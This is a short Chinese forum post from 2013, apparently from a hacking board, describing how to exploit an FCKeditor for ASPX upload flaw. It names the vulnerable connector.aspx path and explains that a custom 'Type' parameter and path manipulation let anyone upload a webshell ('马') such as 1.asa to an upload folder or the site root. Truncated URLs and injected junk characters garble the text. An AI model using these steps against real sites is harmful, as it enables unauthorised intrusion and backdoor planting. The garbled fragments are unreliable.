找回密码
 立即注册
查看: 2424|回复: 0
打印 上一主题 下一主题

fckeditor for aspx 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-29 19:30:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
出现上传漏洞的地址是:
( C1 `* c, Y6 x, Z$ T' o/ f! Nhttp://www.xxx.com/admin/FCKedit ... aspx/connector.aspx
2 Y( O  c! l' s7 Q. Q* h打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:" h; x  Q6 _5 y- n5 P
http://www.xxx.com/UserFiles/all/1.asa. X$ v; l! g& \, I% E* l
"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
- z. I6 p" p9 b! [. `+ u4 E8 V比如输入:
  H9 @* u; u- V) h  ]8 z( M+ ohttp://www.xxx.com/admin/FCKedit ... aspx/connector.aspx
, T$ Z! S5 T$ ^; r1 b所传的文件就到了 http://www.xxx.com/UserFiles/monyer/ 下了
1 p6 q9 o/ e2 _; \而如果这样输入:http://www.xxx.com/admin/FCKedit ... aspx/connector.aspx6 G0 a, T' Y! W1 s/ ^; I: v) H
就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表